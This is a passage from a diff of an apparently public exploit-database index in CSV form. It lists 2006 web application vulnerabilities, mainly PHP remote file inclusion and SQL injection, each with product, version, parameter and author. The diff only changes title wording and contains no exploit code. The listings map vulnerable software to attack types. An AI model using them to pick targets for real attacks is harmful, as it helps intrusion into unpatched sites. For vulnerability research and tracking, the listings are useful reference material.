Parameter Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0 +2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0 2257,platforms/php/webapps/2257.txt,"CliServ Web Community 0.65 - (cl_headers) Include",2006-08-25,Kacper,php,webapps,0 2259,platforms/php/webapps/2259.txt,"ProManager 0.73 - 'note.php' SQL Injection",2006-08-26,Kacper,php,webapps,0 -2260,platforms/php/webapps/2260.pl,"AlberT-EasySite 1.0a5 - 'PSA_PATH' Parameter Remote File Inclusion",2006-08-27,Kacper,php,webapps,0 +2260,platforms/php/webapps/2260.pl,"AlberT-EasySite 1.0a5 - 'PSA_PATH' Remote File Inclusion",2006-08-27,Kacper,php,webapps,0 2261,platforms/php/webapps/2261.php,"iziContents RC6 - Remote Code Execution",2006-08-27,Kacper,php,webapps,0 2262,platforms/php/webapps/2262.php,"CMS Frogss 0.4 - (podpis) SQL Injection",2006-08-27,Kacper,php,webapps,0 2263,platforms/php/webapps/2263.txt,"Ay System CMS 2.6 - 'main.php' Remote File Inclusion",2006-08-27,SHiKaA,php,webapps,0 @@ -17323,7 +17324,7 @@ id,file,description,date,author,platform,type,port 2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 2296,platforms/asp/webapps/2296.txt,"SimpleBlog 2.3 - 'id' SQL Injection",2006-09-04,Vipsta/MurderSkillz,asp,webapps,0 2297,platforms/php/webapps/2297.pl,"TR Forum 2.0 - SQL Injection / Bypass Security Restriction Exploit",2006-09-04,DarkFig,php,webapps,0 -2298,platforms/php/webapps/2298.php,"pHNews alpha 1 - 'templates_dir' Parameter Remote Code Execution",2006-09-04,Kacper,php,webapps,0 +2298,platforms/php/webapps/2298.php,"pHNews alpha 1 - 'templates_dir' Remote Code Execution",2006-09-04,Kacper,php,webapps,0 2299,platforms/php/webapps/2299.php,"PHP Proxima 6 - completepack Remote Code Execution",2006-09-04,Kacper,php,webapps,0 2300,platforms/php/webapps/2300.pl,"SoftBB 0.1 - (cmd) Remote Command Execution",2006-09-04,DarkFig,php,webapps,0 2301,platforms/php/webapps/2301.txt,"MySpeach 3.0.2 - (my_ms[root]) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 @@ -17339,7 +17340,7 @@ id,file,description,date,author,platform,type,port 2313,platforms/php/webapps/2313.txt,"phpFullAnnu 5.1 - (repmod) Remote File Inclusion",2006-09-06,SHiKaA,php,webapps,0 2314,platforms/php/webapps/2314.txt,"Beautifier 0.1 - 'Core.php' Remote File Inclusion",2006-09-06,"the master",php,webapps,0 2315,platforms/php/webapps/2315.txt,"Akarru 0.4.3.34 - (bm_content) Remote File Inclusion",2006-09-06,ddoshomo,php,webapps,0 -2316,platforms/php/webapps/2316.txt,"PayProCart 1146078425 - Multiple Remote File Inclusion",2006-09-07,momo26,php,webapps,0 +2316,platforms/php/webapps/2316.txt,"PayProCart 1146078425 - Multiple Remote File Inclusions",2006-09-07,momo26,php,webapps,0 2317,platforms/php/webapps/2317.txt,"SL_Site 1.0 - (spaw_root) Remote File Inclusion",2006-09-07,Kw3[R]Ln,php,webapps,0 2318,platforms/php/webapps/2318.txt,"Web Server Creator 0.1 - (l) Remote File Inclusion",2006-09-07,"Mehmet Ince",php,webapps,0 2319,platforms/php/webapps/2319.txt,"Fire Soft Board RC 3 - (racine) Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 @@ -17348,7 +17349,7 @@ id,file,description,date,author,platform,type,port 2323,platforms/php/webapps/2323.txt,"PhpNews 1.0 - 'Include' Remote File Inclusion",2006-09-07,"the master",php,webapps,0 2324,platforms/php/webapps/2324.txt,"ACGV News 0.9.1 - 'header.php' Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 2325,platforms/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 -2326,platforms/php/webapps/2326.txt,"WM-News 0.5 - Multiple Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 +2326,platforms/php/webapps/2326.txt,"WM-News 0.5 - Multiple Remote File Inclusions",2006-09-07,ddoshomo,php,webapps,0 2327,platforms/php/webapps/2327.txt,"PhotoKorn Gallery 1.52 - (dir_path) Remote File Inclusion",2006-09-07,"Saudi Hackrz",php,webapps,0 2329,platforms/php/webapps/2329.txt,"Somery 0.4.6 - (skin_dir) Remote File Inclusion",2006-09-08,basher13,php,webapps,0 2333,platforms/php/webapps/2333.php,"CCleague Pro 1.0.1RC1 - 'cookie' Remote Code Execution",2006-09-08,Kacper,php,webapps,0 @@ -17371,7 +17372,7 @@ id,file,description,date,author,platform,type,port 2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded 1.0.6-r3 - Remote File Inclusion",2006-09-12,CeNGiZ-HaN,php,webapps,0 2354,platforms/php/webapps/2354.txt,"Telekorn Signkorn Guestbook 1.3 - (dir_path) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2356,platforms/php/webapps/2356.txt,"Quicksilver Forums 1.2.1 - Remote File Inclusion",2006-09-13,mdx,php,webapps,0 -2357,platforms/php/webapps/2357.txt,"phpunity.postcard - 'gallery_path' Parameter Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0 +2357,platforms/php/webapps/2357.txt,"phpunity.postcard - 'gallery_path' Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0 2359,platforms/php/webapps/2359.txt,"Downstat 1.8 - (art) Remote File Inclusion",2006-09-13,SilenZ,php,webapps,0 2361,platforms/php/webapps/2361.txt,"Shadowed Portal 5.599 - (root) Remote File Inclusion",2006-09-13,mad_hacker,php,webapps,0 2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 - 'icerikno' SQL Injection",2006-09-13,RMx,asp,webapps,0 @@ -17402,7 +17403,7 @@ id,file,description,date,author,platform,type,port 2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - 'Review.asp' SQL Injection",2006-09-17,ajann,asp,webapps,0 2388,platforms/php/webapps/2388.txt,"CMtextS 1.0 - 'users_logins/admin.txt' Credentials Disclosure",2006-09-17,Kacper,php,webapps,0 2389,platforms/php/webapps/2389.pl,"Alstrasoft e-Friends 4.85 - Remote Command Execution",2006-09-18,Kw3[R]Ln,php,webapps,0 -2390,platforms/php/webapps/2390.txt,"PNPHPBB2 < 1.2g - 'phpbb_root_path' Parameter Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0 +2390,platforms/php/webapps/2390.txt,"PNPHPBB2 < 1.2g - 'phpbb_root_path' Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0 2391,platforms/php/webapps/2391.php,"Exponent CMS 0.96.3 - (view) Remote Command Execution",2006-09-19,rgod,php,webapps,0 2392,platforms/php/webapps/2392.txt,"Pie Cart Pro - (Home_Path) Remote File Inclusion",2006-09-19,"Saudi Hackrz",php,webapps,0 2393,platforms/php/webapps/2393.txt,"Pie Cart Pro - (Inc_Dir) Remote File Inclusion",2006-09-19,SnIpEr_SA,php,webapps,0 @@ -17410,16 +17411,16 @@ id,file,description,date,author,platform,type,port 2395,platforms/asp/webapps/2395.txt,"Tekman Portal 1.0 - 'tr' SQL Injection",2006-09-19,"Fix TR",asp,webapps,0 2396,platforms/php/webapps/2396.txt,"Simple Discussion Board 0.1.0 - Remote File Inclusion",2006-09-19,CeNGiZ-HaN,php,webapps,0 2397,platforms/php/webapps/2397.py,"MyReview 1.9.4 - 'email' SQL Injection / Code Execution",2006-09-19,STILPU,php,webapps,0 -2398,platforms/php/webapps/2398.txt,"Digital WebShop 1.128 - Multiple Remote File Inclusion",2006-09-19,ajann,php,webapps,0 +2398,platforms/php/webapps/2398.txt,"Digital WebShop 1.128 - Multiple Remote File Inclusions",2006-09-19,ajann,php,webapps,0 2399,platforms/php/webapps/2399.txt,"BCWB 0.99 - 'ROOT_PATH' Remote File Inclusion",2006-09-19,ajann,php,webapps,0 2402,platforms/php/webapps/2402.php,"PHP Blue Dragon CMS 2.9.1 - (Cross-Site Scripting / SQL Injection) Code Execution",2006-09-20,Kacper,php,webapps,0 -2405,platforms/php/webapps/2405.txt,"AllMyGuests 0.4.1 - 'cfg_serverpath' Parameter Remote File Inclusion",2006-09-20,Br@Him,php,webapps,0 +2405,platforms/php/webapps/2405.txt,"AllMyGuests 0.4.1 - 'cfg_serverpath' Remote File Inclusion",2006-09-20,Br@Him,php,webapps,0 2406,platforms/php/webapps/2406.php,"exV2 < 2.0.4.3 - (sort) SQL Injection",2006-09-21,rgod,php,webapps,0 -2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - 'nbs' Parameter Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0 +2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - 'nbs' Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0 2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 - 'dix.php3' Remote File Inclusion",2006-09-21,DaDIsS,php,webapps,0 2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 - 'phpQRootDir' Remote File Inclusion",2006-09-21,Solpot,php,webapps,0 2411,platforms/php/webapps/2411.pl,"ProgSys 0.156 - 'RR.php' Remote File Inclusion",2006-09-21,Kacper,php,webapps,0 -2413,platforms/php/webapps/2413.txt,"SolidState 0.4 - Multiple Remote File Inclusion",2006-09-21,Kacper,php,webapps,0 +2413,platforms/php/webapps/2413.txt,"SolidState 0.4 - Multiple Remote File Inclusions",2006-09-21,Kacper,php,webapps,0 2414,platforms/php/webapps/2414.txt,"Wili-CMS 0.1.1 - Remote File Inclusion / Cross-Site Scripting / Full Path Disclosure",2006-09-21,"HACKERS PAL",php,webapps,0 2415,platforms/php/webapps/2415.php,"exV2 < 2.0.4.3 - 'extract()' Remote Command Execution",2006-09-22,rgod,php,webapps,0 2416,platforms/asp/webapps/2416.txt,"xweblog 2.1 - 'kategori.asp' SQL Injection",2006-09-22,Muhacir,asp,webapps,0 @@ -17444,7 +17445,7 @@ id,file,description,date,author,platform,type,port 2438,platforms/php/webapps/2438.txt,"Kietu? < 4.0.0b2 - 'hit.php' Remote File Inclusion",2006-09-26,D_7J,php,webapps,0 2439,platforms/php/webapps/2439.txt,"Newswriter SW 1.42 - 'editfunc.inc.php' File Inclusion",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 - PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0 -2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Inclusion",2006-09-27,v1per-haCker,php,webapps,0 +2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Inclusions",2006-09-27,v1per-haCker,php,webapps,0 2443,platforms/php/webapps/2443.txt,"Newswriter SW 1.4.2 - 'main.inc.php' Remote File Inclusion",2006-09-27,"Mehmet Ince",php,webapps,0 2446,platforms/php/webapps/2446.php,"PPA Gallery 1.0 - 'functions.inc.php' Remote File Inclusion",2006-09-28,Kacper,php,webapps,0 2447,platforms/php/webapps/2447.php,"KGB 1.87 - Local File Inclusion / Remote Code Execution",2006-09-28,Kacper,php,webapps,0 @@ -17457,7 +17458,7 @@ id,file,description,date,author,platform,type,port 2455,platforms/php/webapps/2455.php,"VideoDB 2.2.1 - 'pdf.php' Remote File Inclusion",2006-09-29,Kacper,php,webapps,0 2456,platforms/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a - 'display.php' SQL Injection",2006-09-29,Trex,php,webapps,0 2457,platforms/php/webapps/2457.php,"UBBCentral UBB.Threads 6.5.1.1 - 'doeditconfig.php' Code Execution",2006-09-29,"HACKERS PAL",php,webapps,0 -2459,platforms/php/webapps/2459.txt,"Forum82 < 2.5.2b - 'repertorylevel' Multiple File Inclusion",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0 +2459,platforms/php/webapps/2459.txt,"Forum82 < 2.5.2b - 'repertorylevel' Multiple File Inclusions",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0 2461,platforms/php/webapps/2461.txt,"VAMP Webmail 2.0beta1 - 'yesno.phtml' Remote File Inclusion",2006-09-30,Drago84,php,webapps,0 2462,platforms/php/webapps/2462.txt,"phpMyWebmin 1.0 - (target) Remote File Inclusion",2006-09-30,"Mehmet Ince",php,webapps,0 2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - (BSX_LIBDIR) Remote File Inclusion",2006-10-01,Kacper,php,webapps,0 @@ -17467,7 +17468,7 @@ id,file,description,date,author,platform,type,port 2471,platforms/php/webapps/2471.pl,"Travelsized CMS 0.4 - 'FrontPage.php' Remote File Inclusion",2006-10-03,Kacper,php,webapps,0 2472,platforms/php/webapps/2472.pl,"Klinza Professional CMS 5.0.1 - 'show_hlp.php' File Inclusion",2006-10-03,Kacper,php,webapps,0 2473,platforms/php/webapps/2473.c,"Invision Gallery 2.0.7 - 'readfile()' / SQL Injection",2006-10-03,1nf3ct0r,php,webapps,0 -2474,platforms/php/webapps/2474.txt,"JAF CMS 4.0 RC1 - Multiple Remote File Inclusion",2006-10-04,"ThE TiGeR",php,webapps,0 +2474,platforms/php/webapps/2474.txt,"JAF CMS 4.0 RC1 - Multiple Remote File Inclusions",2006-10-04,"ThE TiGeR",php,webapps,0 2475,platforms/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod 0.94b - Remote File Inclusion",2006-10-04,SpiderZ,php,webapps,0 2476,platforms/php/webapps/2476.txt,"PHPGreetz 0.99 - 'footer.php' Remote File Inclusion",2006-10-04,mozi,php,webapps,0 2477,platforms/php/webapps/2477.txt,"phpBB Static Topics 1.0 - 'phpbb_root_path' File Inclusion",2006-10-04,Kw3[R]Ln,php,webapps,0 @@ -17499,7 +17500,7 @@ id,file,description,date,author,platform,type,port 2505,platforms/php/webapps/2505.txt,"JASmine 0.0.2 - 'index.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 2506,platforms/php/webapps/2506.txt,"Foafgen 0.3 - 'redir.php' Local Source Disclosure",2006-10-10,DarkFig,php,webapps,0 2507,platforms/php/webapps/2507.txt,"Album Photo Sans Nom 1.6 - Remote Source Disclosure",2006-10-10,DarkFig,php,webapps,0 -2508,platforms/php/webapps/2508.txt,"vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusion",2006-10-10,the_day,php,webapps,0 +2508,platforms/php/webapps/2508.txt,"vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusions",2006-10-10,the_day,php,webapps,0 2509,platforms/php/webapps/2509.txt,"Exhibit Engine 1.5 RC 4 - 'photo_comment.php' File Inclusion",2006-10-10,Kacper,php,webapps,0 2510,platforms/php/webapps/2510.txt,"Claroline 1.8.0 rc1 - 'import.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 2511,platforms/php/webapps/2511.txt,"PHPLibrary 1.5.3 - 'grid3.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 @@ -17508,7 +17509,7 @@ id,file,description,date,author,platform,type,port 2514,platforms/php/webapps/2514.txt,"n@board 3.1.9e - 'naboard_pnr.php' Remote File Inclusion",2006-10-11,mdx,php,webapps,0 2516,platforms/php/webapps/2516.pl,"CommunityPortals 1.0 - 'import-archive.php' File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 2517,platforms/php/webapps/2517.pl,"PHP News Reader 2.6.4 - 'phpBB.inc.php' Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 -2518,platforms/php/webapps/2518.txt,"SH-News 3.1 - 'scriptpath' Parameter Remote File Inclusion",2006-10-11,v1per-haCker,php,webapps,0 +2518,platforms/php/webapps/2518.txt,"SH-News 3.1 - 'scriptpath' Remote File Inclusion",2006-10-11,v1per-haCker,php,webapps,0 2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - 'ftag.php' Remote File Inclusion",2006-10-11,Zickox,php,webapps,0 2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library 1.5.3 - Remote File Inclusion",2006-10-12,MP,php,webapps,0 2521,platforms/php/webapps/2521.txt,"Download-Engine 1.4.2 - 'spaw' Remote File Inclusion",2006-10-12,v1per-haCker,php,webapps,0 @@ -17516,7 +17517,7 @@ id,file,description,date,author,platform,type,port 2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod 0.1.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0 2526,platforms/php/webapps/2526.txt,"PHPht Topsites - 'common.php' Remote File Inclusion",2006-10-12,"Mehmet Ince",php,webapps,0 2527,platforms/php/webapps/2527.c,"Invision Gallery 2.0.7 (Linux) - 'readfile()' / SQL Injection",2006-10-12,ShadOS,php,webapps,0 -2528,platforms/php/webapps/2528.txt,"MiniBB keyword_replacer 1.0 - 'pathToFiles' Parameter File Inclusion",2006-10-12,Kw3[R]Ln,php,webapps,0 +2528,platforms/php/webapps/2528.txt,"MiniBB keyword_replacer 1.0 - 'pathToFiles' File Inclusion",2006-10-12,Kw3[R]Ln,php,webapps,0 2529,platforms/php/webapps/2529.txt,"AFGB Guestbook 2.2 - 'Htmls' Remote File Inclusion",2006-10-12,mdx,php,webapps,0 2531,platforms/php/webapps/2531.txt,"phpBB Import Tools Mod 0.1.4 - Remote File Inclusion",2006-10-12,boecke,php,webapps,0 2532,platforms/php/webapps/2532.txt,"phpBB Ajax Shoutbox 0.0.5 - Remote File Inclusion",2006-10-12,boecke,php,webapps,0 @@ -17559,14 +17560,14 @@ id,file,description,date,author,platform,type,port 2575,platforms/php/webapps/2575.php,"Boonex Dolphin 5.2 - 'index.php' Remote Code Execution",2006-10-16,w4ck1ng,php,webapps,0 2576,platforms/php/webapps/2576.txt,"Specimen Image Database - 'client.php' Remote File Inclusion",2006-10-16,Kw3[R]Ln,php,webapps,0 2577,platforms/php/webapps/2577.txt,"P-News 1.16 - Remote File Inclusion",2006-10-16,vegas78,php,webapps,0 -2578,platforms/php/webapps/2578.txt,"PHPMyManga 0.8.1 - 'template.php' Multiple File Inclusion",2006-10-16,nuffsaid,php,webapps,0 +2578,platforms/php/webapps/2578.txt,"PHPMyManga 0.8.1 - 'template.php' Multiple File Inclusions",2006-10-16,nuffsaid,php,webapps,0 2579,platforms/php/webapps/2579.pl,"WoltLab Burning Book 1.1.2 - SQL Injection (PoC)",2006-10-16,ShAnKaR,php,webapps,0 2582,platforms/php/webapps/2582.txt,"ALiCE-CMS 0.1 - 'CONFIG[local_root]' Remote File Inclusion",2006-10-17,nuffsaid,php,webapps,0 2583,platforms/php/webapps/2583.php,"WSN Forum 1.3.4 - 'prestart.php' Remote Code Execution",2006-10-17,Kacper,php,webapps,0 2584,platforms/php/webapps/2584.pl,"PHPRecipeBook 2.35 - 'g_rb_basedir' Remote File Inclusion",2006-10-17,r0ut3r,php,webapps,0 -2585,platforms/php/webapps/2585.txt,"PHPmybibli 3.0.1 - Multiple Remote File Inclusion",2006-10-17,the_day,php,webapps,0 +2585,platforms/php/webapps/2585.txt,"PHPmybibli 3.0.1 - Multiple Remote File Inclusions",2006-10-17,the_day,php,webapps,0 2588,platforms/php/webapps/2588.txt,"Easynews 4.4.1 - 'admin.php' Authentication Bypass",2006-10-17,nuffsaid,php,webapps,0 -2589,platforms/php/webapps/2589.txt,"Brim 1.2.1 - 'renderer' Multiple Remote File Inclusion",2006-10-17,mdx,php,webapps,0 +2589,platforms/php/webapps/2589.txt,"Brim 1.2.1 - 'renderer' Multiple Remote File Inclusions",2006-10-17,mdx,php,webapps,0 2590,platforms/php/webapps/2590.txt,"PHPPowerCards 2.10 - 'txt.inc.php' Remote Code Execution",2006-10-18,nuffsaid,php,webapps,0 2591,platforms/php/webapps/2591.txt,"PHP AMX 0.90 - 'plugins/main.php' Remote File Inclusion",2006-10-18,MP,php,webapps,0 2592,platforms/asp/webapps/2592.htm,"Active Bulletin Board 1.1b2 - Remote User Pass Change Exploit",2006-10-18,ajann,asp,webapps,0 @@ -17585,7 +17586,7 @@ id,file,description,date,author,platform,type,port 2607,platforms/php/webapps/2607.txt,"kawf 1.0 - 'main.php' Remote File Inclusion",2006-10-21,o0xxdark0o,php,webapps,0 2608,platforms/php/webapps/2608.txt,"Virtual Law Office - 'phpc_root_path' Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps,0 2609,platforms/php/webapps/2609.txt,"Open Meetings Filing Application - Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps,0 -2611,platforms/php/webapps/2611.txt,"Trawler Web CMS 1.8.1 - Multiple Remote File Inclusion",2006-10-21,k1tk4t,php,webapps,0 +2611,platforms/php/webapps/2611.txt,"Trawler Web CMS 1.8.1 - Multiple Remote File Inclusions",2006-10-21,k1tk4t,php,webapps,0 2612,platforms/php/webapps/2612.txt,"PGOSD - 'misc/function.php3' Remote File Inclusion",2006-10-22,"Mehmet Ince",php,webapps,0 2613,platforms/php/webapps/2613.txt,"Mambo Module MambWeather 1.8.1 - Remote File Inclusion",2006-10-22,h4ntu,php,webapps,0 2614,platforms/php/webapps/2614.txt,"Net_DNS 0.3 - 'DNS/RR.php' Remote File Inclusion",2006-10-22,Drago84,php,webapps,0 @@ -17593,8 +17594,8 @@ id,file,description,date,author,platform,type,port 2616,platforms/php/webapps/2616.php,"JaxUltraBB 2.0 - 'delete.php' Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0 2617,platforms/php/webapps/2617.php,"PHP-Nuke 7.9 - (Encyclopedia) SQL Injection",2006-10-22,Paisterist,php,webapps,0 2620,platforms/php/webapps/2620.txt,"EZ-Ticket 0.0.1 - 'common.php' Remote File Inclusion",2006-10-22,"the master",php,webapps,0 -2621,platforms/php/webapps/2621.txt,"Fully Modded phpBB 2021.4.40 - Multiple File Inclusion",2006-10-23,020,php,webapps,0 -2622,platforms/php/webapps/2622.txt,"OTSCMS 2.1.3 - Multiple Remote File Inclusion",2006-10-23,GregStar,php,webapps,0 +2621,platforms/php/webapps/2621.txt,"Fully Modded phpBB 2021.4.40 - Multiple File Inclusions",2006-10-23,020,php,webapps,0 +2622,platforms/php/webapps/2622.txt,"OTSCMS 2.1.3 - Multiple Remote File Inclusions",2006-10-23,GregStar,php,webapps,0 2623,platforms/php/webapps/2623.pl,"SourceForge 1.0.4 - 'database.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0 2624,platforms/php/webapps/2624.txt,"WiClear 0.10 - (path) Remote File Inclusion",2006-10-23,"the master",php,webapps,0 2626,platforms/php/webapps/2626.txt,"MDweb 1.3 - (chemin_appli) Remote File Inclusion",2006-10-23,Drago84,php,webapps,0 @@ -17602,7 +17603,7 @@ id,file,description,date,author,platform,type,port 2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - 'includes/functions.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0 2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x - 'lib.editor.inc.php' Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 2631,platforms/php/webapps/2631.php,"Ascended Guestbook 1.0.0 - 'embedded.php' File Inclusion",2006-10-24,Kacper,php,webapps,0 -2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - 'mainpath' Parameter Remote File Inclusion",2006-10-24,r0ut3r,php,webapps,0 +2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - 'mainpath' Remote File Inclusion",2006-10-24,r0ut3r,php,webapps,0 2640,platforms/php/webapps/2640.txt,"UeberProject 1.0 - 'login/secure.php' Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 2642,platforms/asp/webapps/2642.asp,"Berty Forum 1.4 - 'index.php' Blind SQL Injection",2006-10-24,ajann,asp,webapps,0 2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 - Command Execution",2006-10-24,BlackHawk,php,webapps,0 @@ -17641,7 +17642,7 @@ id,file,description,date,author,platform,type,port 2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - Remote Code Execution",2006-10-30,Kacper,php,webapps,0 2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - Remote File Inclusion",2006-10-30,Kacper,php,webapps,0 2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Login Bypass (SQL Injection)",2006-10-30,ajann,php,webapps,0 -2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusion",2006-10-30,v1per-haCker,php,webapps,0 +2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusions",2006-10-30,v1per-haCker,php,webapps,0 2691,platforms/php/webapps/2691.txt,"P-Book 1.17 - (pb_lang) Remote File Inclusion",2006-10-31,Matdhule,php,webapps,0 2692,platforms/php/webapps/2692.txt,"GEPI 1.4.0 - 'gestion/savebackup.php' Remote File Inclusion",2006-10-31,"Sumit Siddharth",php,webapps,0 2693,platforms/php/webapps/2693.txt,"PwsPHP 1.1 - 'themes/fin.php' Remote File Inclusion",2006-10-31,3l3ctric-Cracker,php,webapps,0 @@ -17668,9 +17669,9 @@ id,file,description,date,author,platform,type,port 2721,platforms/php/webapps/2721.php,"Ultimate PHP Board 2.0 - 'header_simple.php' File Inclusion",2006-11-05,Kacper,php,webapps,0 2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - 'message_details.php' SQL Injection",2006-11-05,Bl0od3r,php,webapps,0 2724,platforms/php/webapps/2724.txt,"Soholaunch Pro 4.9 r36 - Remote File Inclusion",2006-11-06,the_day,php,webapps,0 -2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - 'av' Parameter Remote File Inclusion",2006-11-06,the_day,php,webapps,0 +2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - 'av' Remote File Inclusion",2006-11-06,the_day,php,webapps,0 2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 - 'MysqlfinderAdmin.php' Remote File Inclusion",2006-11-06,the_day,php,webapps,0 -2727,platforms/php/webapps/2727.txt,"OpenEMR 2.8.1 - (srcdir) Multiple Remote File Inclusion",2006-11-06,the_day,php,webapps,0 +2727,platforms/php/webapps/2727.txt,"OpenEMR 2.8.1 - 'srcdir' Multiple Remote File Inclusions",2006-11-06,the_day,php,webapps,0 2728,platforms/php/webapps/2728.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection",2006-11-06,Liz0ziM,php,webapps,0 2731,platforms/php/webapps/2731.pl,"iPrimal Forums - 'admin/index.php' Change User Password Exploit",2006-11-06,Bl0od3r,php,webapps,0 2732,platforms/php/webapps/2732.txt,"PHPGiggle 12.08 - 'CFG_PHPGIGGLE_ROOT' File Inclusion",2006-11-06,ajann,php,webapps,0 @@ -17735,10 +17736,10 @@ id,file,description,date,author,platform,type,port 2818,platforms/php/webapps/2818.txt,"e-Ark 1.0 - 'src/ark_inc.php' Remote File Inclusion",2006-11-21,DeltahackingTEAM,php,webapps,0 2819,platforms/php/webapps/2819.txt,"LDU 8.x - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0 2820,platforms/php/webapps/2820.txt,"Seditio 1.10 - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0 -2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 - 'pageid' Parameter SQL Injection",2006-11-21,Revenge,php,webapps,0 +2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 - 'pageid' SQL Injection",2006-11-21,Revenge,php,webapps,0 2823,platforms/php/webapps/2823.txt,"aBitWhizzy - 'abitwhizzy.php' Information Disclosure",2006-11-21,"Security Access Point",php,webapps,0 -2826,platforms/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Inclusion",2006-11-21,3l3ctric-Cracker,php,webapps,0 -2827,platforms/php/webapps/2827.txt,"phpPC 1.04 - Multiple Remote File Inclusion",2006-11-21,iss4m,php,webapps,0 +2826,platforms/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Inclusions",2006-11-21,3l3ctric-Cracker,php,webapps,0 +2827,platforms/php/webapps/2827.txt,"phpPC 1.04 - Multiple Remote File Inclusions",2006-11-21,iss4m,php,webapps,0 2828,platforms/asp/webapps/2828.pl,"FipsCMS 4.5 - 'index.asp' SQL Injection",2006-11-22,ajann,asp,webapps,0 2829,platforms/asp/webapps/2829.txt,"fipsGallery 1.5 - 'index1.asp' SQL Injection",2006-11-22,ajann,asp,webapps,0 2830,platforms/asp/webapps/2830.txt,"fipsForum 2.6 - 'default2.asp' SQL Injection",2006-11-22,ajann,asp,webapps,0 @@ -17781,8 +17782,8 @@ id,file,description,date,author,platform,type,port 2886,platforms/php/webapps/2886.txt,"PHP Upload Center 2.0 - 'activate.php' File Inclusion",2006-12-03,GregStar,php,webapps,0 2888,platforms/php/webapps/2888.php,"Envolution 1.1.0 - (PNSVlang) Remote Code Execution",2006-12-03,Kacper,php,webapps,0 2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 - 'categories.php' Local File Inclusion",2006-12-03,r0ut3r,php,webapps,0 -2890,platforms/php/webapps/2890.txt,"PHP-revista 1.1.2 - (adodb) Multiple Remote File Inclusion",2006-12-03,"Cold Zero",php,webapps,0 -2891,platforms/php/webapps/2891.txt,"CuteNews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0 +2890,platforms/php/webapps/2890.txt,"PHP-revista 1.1.2 - 'adodb' Multiple Remote File Inclusions",2006-12-03,"Cold Zero",php,webapps,0 +2891,platforms/php/webapps/2891.txt,"CuteNews aj-fork 167f - 'cutepath' Remote File 